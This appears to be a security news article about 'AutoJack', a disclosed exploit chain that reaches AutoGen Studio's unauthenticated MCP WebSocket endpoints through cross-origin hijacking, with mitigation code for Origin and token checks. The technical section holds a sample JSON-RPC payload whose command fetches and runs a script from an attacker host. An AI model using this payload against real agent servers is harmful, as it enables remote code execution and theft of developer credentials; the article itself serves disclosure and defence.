Executive Summary
Microsoft researchers disclosed 'AutoJack', a remote code execution exploit targeting AutoGen Studio via unauthenticated WebSocket browser hijacking.

Microsoft Discloses 'AutoJack' AI Agent RCE Chain Targeting AutoGen Studio

By Vatsal Shah · June 19, 2026 · Cyber Security · Source: Microsoft Security Response Center


AI SUMMARY

  • Microsoft Security researchers publicly disclosed 'AutoJack' on June 18, 2026, a critical exploit chain resulting in Remote Code Execution (RCE) on developer machines.
  • The vulnerability targets pre-release builds of AutoGen Studio that expose unauthenticated WebSocket endpoints under the /api/mcp/* path.
  • By leveraging cross-origin WebSocket hijacking (CSWSH), malicious websites can send commands to local AutoGen services, bypassing standard localhost trust boundaries.
  • The exploit allows an attacker to hijack the agent's web browsing actions and execute arbitrary shell commands with the privileges of the local developer.
  • Microsoft and the AutoGen team have released an upstream main branch patch enforcing WebSocket token authentication and restricting cross-origin requests.

What Happened

On June 18, 2026, Microsoft Security Response Center (MSRC) published a warning detailing 'AutoJack', a multi-stage exploit chain that allows remote attackers to execute arbitrary code on developer workstations. The vector exploits a vulnerability in the local development server of AutoGen Studio, Microsoft’s popular multi-agent orchestration framework.

The vulnerability stems from the way AutoGen Studio handles local connections. Because developers run AutoGen Studio locally (typically binding to localhost:8081 or similar), the service assumed that any incoming connection from the local machine was trusted. However, Microsoft researchers demonstrated that this localhost trust bypass can be triggered externally. If a developer running AutoGen Studio visits a malicious website or clicks a poisoned link in an agent's browser, the attacker's site can run client-side script in the background. This script opens a connection to the local AutoGen server, bypassing standard cross-origin protection.

AutoGen Studio Security Compromise Visualization
Figure 1: Visualization of the AutoJack exploit chain, showing a remote host hijacking local AutoGen Studio development servers via unauthenticated browser vectors.

Once connected, the exploit utilizes unauthenticated Model Context Protocol (MCP) endpoints. By sending specialized payloads over the WebSockets interface at /api/mcp/*, the attacker can force the AutoGen orchestration engine to execute system commands under the guise of agent tool calls, resulting in full compromise of the developer's system. The AutoGen team has committed a hotfix to the main project branch to enforce strict authorization tokens and CORS controls.


Technical Analysis of the Exploit Chain

The AutoJack vulnerability highlights a major security challenge in the design of agentic tools: the assumption of local network safety. The exploit utilizes three distinct phases to transition from a browser tab to local system execution.

Phase 1: Bypassing Localhost Trust Bounds

Browsers enforce Cross-Origin Resource Sharing (CORS) rules on standard HTTP requests from an external public site (e.g., attacker.com) to a local address (e.g., 127.0.0.1:8081), so a script cannot read the response without the server's consent. The WebSocket handshake is not subject to CORS: the browser attaches an Origin header to the upgrade request and leaves it to the server to decide whether that origin may connect.

Through Cross-Origin WebSocket Hijacking (CSWSH), a script running on attacker.com can request a WebSocket upgrade targeting ws://127.0.0.1:8081/api/mcp/chat. Because the AutoGen server did not check the Origin header of incoming WebSocket upgrade requests, it accepted the connection from the malicious origin.

Phase 2: The MCP WebSocket Authentication Flaw

The Model Context Protocol (MCP) allows agents to connect to local servers that expose tools, resources, and prompts. In pre-release builds of AutoGen Studio, these MCP interfaces were unauthenticated.

Once the WebSocket connection is established, the attacker sends an MCP JSON-RPC message that either registers a custom shell-execution tool or, as in the example below, invokes a pre-existing tool (such as execute_command) that runs arbitrary commands:

JSON
{
  "jsonrpc": "2.0",
  "method": "tools/call",
  "params": {
    "name": "execute_command",
    "arguments": {
      "command": "curl -s http://attacker.com/payload | bash"
    }
  },
  "id": 1
}

Phase 3: System Execution

Because the AutoGen Studio server runs with the user permissions of the developer, the command executes locally on the workstation. This grants the attacker access to local environment variables, SSH keys, source repositories, and cloud credentials.

AutoJack RCE Exploit Chain Flowchart
Figure 2: Flowchart of the AutoJack exploit chain, illustrating how an external browser connection transitions to local remote code execution via unauthenticated WebSockets.

Mitigations and Upstream Patches

Upon receiving the report from Microsoft researchers, the AutoGen maintainers worked quickly to release patches. Developers running AutoGen Studio should upgrade to the latest stable release immediately.

Enforcing Strict Authentication Tokens

The hotfix changes the WebSocket startup logic to require a cryptographically random token. When AutoGen Studio launches, it generates a single-use token and writes it to a local configuration file. All client requests, including WebSocket upgrades, must include this token in the query parameters:

ws://127.0.0.1:8081/api/mcp/chat?token=ab89c892e8fa...

Connections lacking a valid token are rejected immediately, which blocks cross-origin attempts because a script on an external site cannot read the local token file.

Restricting the Origin Header

The WebSocket server now validates the Origin header. It permits connections only when the origin matches the configured host (typically localhost or 127.0.0.1) and returns 403 Forbidden for external domains.
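As an added example, not AutoGen's actual hotfix, the following Python handshake gate combines the two controls just described: Origin validation and a constant-time token check on the upgrade request. The port, the token format, the header and query handling, and the sample handshakes are assumptions constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Assumption: the Studio UI is served from port 8081, as the article states.
ALLOWED_ORIGINS = {"http://127.0.0.1:8081", "http://localhost:8081"}


def generate_session_token() -> str:
    """Random token the server writes to its local config file at startup."""
    return secrets.token_urlsafe(32)


def authorize_upgrade(headers, request_target, expected_token,
                      allowed_origins=ALLOWED_ORIGINS):
    """Gate a WebSocket upgrade request; returns (accepted, reason).

    headers: handshake headers (any case); request_target: path plus query,
    e.g. "/api/mcp/chat?token=...". Origin is checked before the token so a
    leaked token is still useless to a page on another origin.
    """
    hdrs = {k.lower(): v for k, v in headers.items()}
    # Browsers always send Origin on a WebSocket upgrade; a missing header means
    # a non-browser client, which must still present the token below.
    origin = hdrs.get("origin")
    if origin is not None and origin.rstrip("/") not in allowed_origins:
        return False, "403 Forbidden: origin not allowed"
    supplied = parse_qs(urlsplit(request_target).query).get("token", [""])[0]
    # Constant-time comparison so a wrong token leaks nothing via timing.
    if not hmac.compare_digest(supplied.encode(), expected_token.encode()):
        return False, "401 Unauthorized: missing or invalid token"
    return True, "accepted"


def evaluate_samples(token):
    """Constructed handshakes covering the article's cases (not captured traffic)."""
    samples = {
        "cswsh_from_attacker_site": (
            {"Host": "127.0.0.1:8081", "Origin": "https://attacker.com"},
            "/api/mcp/chat"),
        "attacker_site_with_leaked_token": (
            {"Origin": "https://attacker.com"}, f"/api/mcp/chat?token={token}"),
        "local_ui_wrong_token": (
            {"Origin": "http://127.0.0.1:8081"}, "/api/mcp/chat?token=wrong"),
        "local_ui_valid_token": (
            {"Origin": "http://127.0.0.1:8081"}, f"/api/mcp/chat?token={token}"),
    }
    return {name: authorize_upgrade(h, t, token) for name, (h, t) in samples.items()}


if __name__ == "__main__":
    for name, (ok, why) in evaluate_samples(generate_session_token()).items():
        print(f"{name:32} {'ACCEPT' if ok else 'REJECT'}  {why}")
```

Only the local UI presenting the correct token is accepted; the attacker-origin request is refused even when it carries a valid token, and a non-browser client without an Origin header is still held to the token check.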

Implementing Agent Browsing Isolation Gates

To prevent agents from visiting malicious sites that trigger these local vectors, organizations are encouraged to implement isolated browsing gateways. An isolation gate routes agent web browsing traffic through an isolated virtual sandbox, preventing scripts from accessing the developer's local loopback interface.

Agent Browsing Isolation Gate Schema
Figure 3: Architecture of an agent browsing isolation gate, showing the separation between public internet requests and the local loopback network.

Why It Matters

The Risk of Agentic Tooling Sprawl

The AutoJack disclosure highlights a growing risk in enterprise AI deployments: the security debt associated with local developer tools. As organizations rush to adopt frameworks like AutoGen and LangGraph, developers are running unauthenticated API services on their local machines, expanding the corporate attack surface.

This trend is part of a broader rise in security vulnerabilities, as detailed in our coverage of AI Agent Security Incidents (88% Rise) and the updated OWASP Agentic AI Security Governance 2.0 guidelines.

Bypassing Localhost Assumptions

Many developer tools treat localhost as a safe zone, assuming that only local users can access it. AutoJack shows that this assumption is flawed. Any local service that does not validate origins, enforce authentication, or restrict WebSocket upgrades can be exploited remotely via browser-based vectors.

To help security teams audit and mitigate these risks, we have built a comprehensive governance framework in our playbook on Surviving Shadow AI & Architecting Enterprise Governance.


What to Watch Next

  • Broadening Security Audits: Security researchers are auditing other popular agent frameworks (including CrewAI, Semantic Kernel, and LangChain templates) for similar cross-origin WebSocket weaknesses.
  • Enterprise Restrictions on Local Servers: Expect corporate security teams to block unauthenticated local loopback servers on developer workstations, mandating centralized, audited developer environments.
  • Model Context Protocol (MCP) Evolution: The MCP working group is drafting standard security models to enforce token authentication and encrypted connections across all host-client interactions.

Source

Microsoft Security Response Center — AutoJack Exploitation Report (Jun 18, 2026)

Additional references: Cloud Security Alliance AI Safety Initiative

Vatsal Shah

Technical Project Manager & Solution Architect

I write code, ship agentic systems, and advise boards from India and global HQ — 15+ years across BFSI, GCC, and Fortune-scale cloud programs. If you need architecture that survives audit, start here.